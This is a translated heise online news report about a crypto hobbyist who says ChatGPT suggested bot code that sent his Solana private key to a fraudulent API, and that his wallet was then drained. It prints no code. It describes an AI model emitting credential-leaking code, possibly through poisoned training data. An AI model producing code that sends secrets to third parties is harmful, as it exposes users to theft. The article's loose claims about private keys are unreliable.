ChatGPT: Code with fraudulent API costs programmers 2500 US dollars

A cryptocurrency enthusiast wanted to program a "bump bot" with ChatGPT. The AI built a fraudulent API into the code.

listen Print view
Programmer in front of the computer, AI bot behind monitor with wallet

(Image: Bild erstellt mit KI in Bing Designer durch heise online / dmk)

2 min. read

A cryptocurrency enthusiast has reported on X that his programming attempt with ChatGPT cost him 2500 US dollars. He wanted to use the artificial intelligence to program a so-called bump bot to advertise his tokens on a cryptocurrency trading platform on Discord servers.

What he did not expect was that ChatGPT would suggest a fraudulent Solana API website. He explains that he took code suggested by ChatGPT that transmits the private key via the API. He also used his main Solana wallet. "When you're in a hurry and doing so many things at once, it's easy to make mistakes," summarizes the program creator with the handle "r_ocky.eth".

r_ocky.eth is obviously not very familiar with security or programming: Private keys are not given out, but are used to encrypt messages. Software development should also never be carried out with a "production account", but with a separate test account. The code snippet, of which he shows a screenshot, even openly states what it does: "Payload for POST request" can be read as a comment, which is followed by the private key that programmers are supposed to enter.

Videos by heise

The fraudster behind the API was quick, reports the scammer, and shortly after using the API he transferred all his crypto assets from the wallet to his own. This took place within 30 minutes after he had sent a request. In the end, he had the feeling that he had done something wrong, but he had lost his trust in OpenAI. He reported the chat history with the fraudulent program code to OpenAI. He informed Github about the fraudulent repository, whereupon it was quickly removed.

Reports that OpenAI's ChatGPT is being used for malware development have already been published frequently. However, the fact that ChatGPT can generate malicious code due to "data poisoning" in the training data is apparently not yet a widespread realization. However, this example proves once again that the results of AI are not blindly trustworthy without question, but should always be checked again.

(dmk)

Don't miss any news – follow us on Facebook, LinkedIn or Mastodon.

This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.